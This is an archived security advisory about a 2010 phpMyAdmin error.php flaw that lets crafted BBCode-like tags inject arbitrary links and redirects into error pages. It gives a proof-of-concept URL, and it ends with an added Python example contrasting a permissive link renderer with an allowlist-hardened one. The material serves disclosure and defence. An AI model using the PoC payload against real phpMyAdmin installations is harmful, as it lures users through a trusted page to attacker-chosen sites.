PhpMyAdmin client-side 0Day redirect link / code injection vulnerability warning (myhack58)

2010-12-22T00:00:00
ID MYHACK58:62201028641
Type myhack58
Reporter Anonymous
Modified 2010-12-22T00:00:00

Description

PhpMyAdmin Client Side 0Day Code Injection and Redirect Link Falsification

Credits:

Emanuele "emgent" Gentili <emgent@backtrack-linux.org>

Marco "white_sheep" Rondini <white_sheep@backtrack-linux.org>

Alessandro "scox" Scoscia <scox@backtrack.it>

In error.php, phpMyAdmin permits inserting free text together with a restricted set of tags, similar to BBCode.

With the tag [a@url@page]Click Me[/a], an attacker can insert a link to an arbitrary page inside the error message and redirect any user who follows it.

PoC:

[http://127.0.0.1/phpmyadmin/error.php?type=This+is+a+client+side+hole+evidence&error=Client+side+attack+via+characters+injection[br]It%27s+possible+use+some+special+tags+too[br]Found+by+Tiger+Security+Tiger+Team+-+[a%40http://www.sitedirsec.com%40_self]This%20Is%20a%20Link%2Fa]
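As an added example (not code from the advisory or from phpMyAdmin), the following Python models the error.php mini-markup described above: a permissive renderer that turns every [a@url@target]text[/a] into a clickable link, beside a hardened renderer that keeps only http(s) links to an assumed allowlist of hosts and drops the link (but not the text) otherwise. The allowlist, function names and sample message are assumptions made for this example.

```python
import html
import re
from urllib.parse import urlsplit

# Hosts a rendered error page may link to (assumed allowlist, not phpMyAdmin's own).
ALLOWED_HOSTS = {"www.phpmyadmin.net", "docs.phpmyadmin.net"}

# The error.php mini-markup described above: [br] and [a@url@target]text[/a].
TAG_RE = re.compile(r"\[br\]|\[a@([^@\]]*)@([^\]]*)\](.*?)\[/a\]", re.DOTALL)

def _link(url, target, text):
    return '<a href="%s" target="%s">%s</a>' % (
        html.escape(url, quote=True), html.escape(target, quote=True), html.escape(text))

def _render(msg, tag_to_html):
    # Everything between tags is HTML-escaped; each recognised tag is
    # handed to tag_to_html, which decides what it may become.
    out, pos = [], 0
    for m in TAG_RE.finditer(msg):
        out.append(html.escape(msg[pos:m.start()]))
        out.append(tag_to_html(m))
        pos = m.end()
    out.append(html.escape(msg[pos:]))
    return "".join(out)

def render_permissive(msg):
    """Weak behaviour: every [a@...] tag becomes a clickable link to any URL."""
    def tag_to_html(m):
        if m.group(0) == "[br]":
            return "<br />"
        return _link(m.group(1), m.group(2), m.group(3))
    return _render(msg, tag_to_html)

def render_hardened(msg):
    """Only http(s) links to allowlisted hosts survive; other link text stays unlinked."""
    def tag_to_html(m):
        if m.group(0) == "[br]":
            return "<br />"
        url, target, text = m.group(1), m.group(2), m.group(3)
        parts = urlsplit(url)  # hostname comparison defeats look-alike prefixes
        ok = (parts.scheme in ("http", "https")
              and parts.hostname in ALLOWED_HOSTS
              and target in ("_self", "_blank"))
        return _link(url, target, text) if ok else html.escape(text)
    return _render(msg, tag_to_html)

# Constructed message shaped like the advisory's PoC, with a placeholder host.
SAMPLE = "Found by someone[br][a@http://attacker.example/@_self]This Is a Link[/a]"
```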